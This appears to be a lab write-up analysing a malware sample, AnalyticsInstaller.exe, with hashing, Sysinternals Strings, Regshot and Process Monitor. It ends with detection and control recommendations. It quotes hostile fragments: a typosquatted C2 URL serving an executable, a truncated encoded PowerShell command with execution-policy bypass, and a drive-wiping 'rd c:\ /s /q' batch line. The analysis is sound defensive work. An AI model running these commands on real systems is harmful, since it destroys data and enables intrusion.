Lab 1.3 - Malware Analysis: AnalyticsInstaller.exe
Triaged AnalyticsInstaller.exe with a static-then-dynamic workflow: hashed it with Get-FileHash (SHA256 D501EF28...), ran Sysinternals Strings to surface IOCs (www1-google-analytics.com:8088/analytics.exe, an HKCU Run key, a base64 -EncodedCommand PowerShell payload, and a destructive AnalyticsBackup.bat containing 'cmd.exe /c rd c:\ /s /q'), then detonated it under Regshot and Process Monitor. The Regshot diff caught a new Schedule\TaskCache\Tree\Analytics Backup key, Get-ScheduledTask confirmed the 'Analytics Backup' task, and Procmon's process tree showed the installer spawning cmd.exe → powershell.exe -ExecutionPolicy Bypass -EncodedCommand.
Commands
1. Hash the sample
Started with the cheapest, safest evidence: a file hash. Get-FileHash produced an MD5 (5524BDF546472FD66D3450C39CC4E2E5) and SHA256 (D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45) of AnalyticsInstaller.exe. A hash is the single most portable IOC, ready to drop into VirusTotal, an EDR block list, or a SIEM watchlist before the binary is ever executed.
Get-FileHash -Algorithm MD5 AnalyticsInstaller.exe Get-FileHash -Algorithm SHA256 AnalyticsInstaller.exe
2. Pull readable strings
Ran Sysinternals Strings (strings.exe -n 10) to dump ASCII and Unicode sequences of 10+ characters from the binary. Even without unpacking, the printable strings leaked the malware's intent in plain text: a C2 URL, a persistence path, and a base64 PowerShell blob.
C:\tools\Sysinternals\strings.exe -n 10 .\AnalyticsInstaller.exe
3. Read the IOCs from the strings
The strings output was a confession. http://www1-google-analytics.com:8088/analytics.exe (a Google Analytics typosquat C2, the same disguise pattern seen in the RITA lab), C:\Windows\System32\analytics.exe (drop path), Software\Microsoft\Windows\CurrentVersion\Run with an 'Analytics Client' value (Run-key persistence), C:\Windows\System32\AnalyticsBackup.bat, a long powershell.exe -ExecutionPolicy Bypass -EncodedCommand JABt... blob, and cmd.exe /c start /max http://www.midnitemeerkats.com/note. Imported API names (RegOpenKeyExW, RegSetValueExW, RegCloseKey from ADVAPI32) confirmed the binary writes the registry itself.
4. Regshot first shot
Switched to dynamic analysis. Regshot takes a full snapshot of the registry (and optionally the filesystem) so changes can be diffed after detonation. Configured it to scan C:\WINDOWS, output to the user profile, then captured the '1st shot' baseline: 395,525 keys and 676,926 values.
5. Detonate and confirm the scheduled task
Ran AnalyticsInstaller.exe in the isolated VM, then immediately checked for a dropped scheduled task with Get-ScheduledTask. A new task appeared: TaskName 'Analytics Backup', State Ready. Scheduled tasks are a top-tier persistence and execution mechanism precisely because they survive reboots and run on a trigger.
.\AnalyticsInstaller.exe Get-ScheduledTask
6. Regshot second shot
Took the Regshot '2nd shot' after detonation (67,014 keys / 77,922 values in the changed scope) so Regshot could diff the two snapshots. The before/after diff is what turns 'something changed' into a precise list of exactly which keys and values the malware touched.
7. Compare the snapshots
Ran the Regshot comparison. The engine walked both snapshots and produced a diff report while the green progress bar ran. Comparing 395K-key baselines against the post-detonation state is exactly the kind of mechanical, high-coverage work that a human could never do by eye.
8. Read the Regshot diff report
Opened the ~res-x64.txt diff. Keys added: 7, including the smoking gun HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Analytics Backup, alongside the matching Plain and Tasks TaskCache GUID entries. This is the registry footprint of the 'Analytics Backup' scheduled task confirmed independently of Get-ScheduledTask, plus the deleted keys/values from normal Windows churn (WER TermReason entries) that a responder learns to ignore.
9. Read the dropped batch payload
Used Get-Content to read the dropped C:\Windows\SysWOW64\AnalyticsBackup.bat. Its entire contents: cmd.exe /c rd c:\ /s /q. That is a destructive wiper: a recursive, quiet, force delete of the C: drive. Naming a drive-wipe 'AnalyticsBackup' and scheduling it as 'Analytics Backup' is deliberate camouflage so a skimming defender reads 'backup' and moves on.
Get-Content C:\Windows\SysWOW64\AnalyticsBackup.bat
10. Filter Process Monitor
Launched Sysinternals Process Monitor and set a filter: Process Name is AnalyticsInstaller.exe → Include, with the usual analysis-tool noise (Procmon, Procexp, Autoruns, System) excluded. Filtering before detonation keeps the capture focused on the malware's own activity instead of the thousands of events Windows generates per second.
11. Re-detonate under Procmon
Re-ran AnalyticsInstaller.exe with Process Monitor capturing. The filtered event stream records every file, registry, process, and network operation the binary performs, in order, with full detail.
.\AnalyticsInstaller.exe
12. Find the Process Create event
Used Procmon's Find (Ctrl+F) for 'Process Create' to jump straight to the moment the malware spawned a child process, skipping past the file and registry operations to the execution event that matters most.
13. Read the encoded PowerShell command line
The Process Create event properties revealed the child: C:\WINDOWS\SysWOW64\cmd.exe launching cmd.exe /c powershell.exe -ExecutionPolicy Bypass -EncodedCommand AEkAZgBHAG8... The -EncodedCommand flag takes base64 so the real script never appears in plaintext on the command line, and -ExecutionPolicy Bypass sidesteps script restrictions. This is the runtime confirmation of the encoded blob seen statically in the strings.
14. Reconstruct the process tree
Opened Procmon's Process Tree to see the full lineage: AnalyticsInstaller.exe (PID 5804), launched by powershell.exe under Explorer, started and exited within ~21 seconds. The tree ties the binary, its parent shell, and its short-lived execution window together into one picture, which is exactly what an IR timeline needs.
Key Findings
- SHA256 D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45 (MD5 5524BDF546472FD66D3450C39CC4E2E5)
- C2 / payload URL: http://www1-google-analytics.com:8088/analytics.exe (Google Analytics typosquat)
- Persistence: HKCU/HKLM ...\CurrentVersion\Run 'Analytics Client' and a 'Analytics Backup' scheduled task
- Dropped wiper: AnalyticsBackup.bat containing cmd.exe /c rd c:\ /s /q
- Runtime: AnalyticsInstaller.exe → cmd.exe → powershell.exe -ExecutionPolicy Bypass -EncodedCommand
Security Controls
- Application control / WDAC to block unsigned binaries from user-writable paths
- PowerShell script-block logging and transcription to capture decoded -EncodedCommand content
- Scheduled-task and Run-key baselining with alerting on new entries
- EDR detonation/behavioral detection for cmd.exe → powershell.exe -EncodedCommand chains
- Egress filtering and DNS monitoring for typosquatted analytics domains
- Tamper-resistant, offline backups to survive a destructive 'rd c:\ /s /q' payload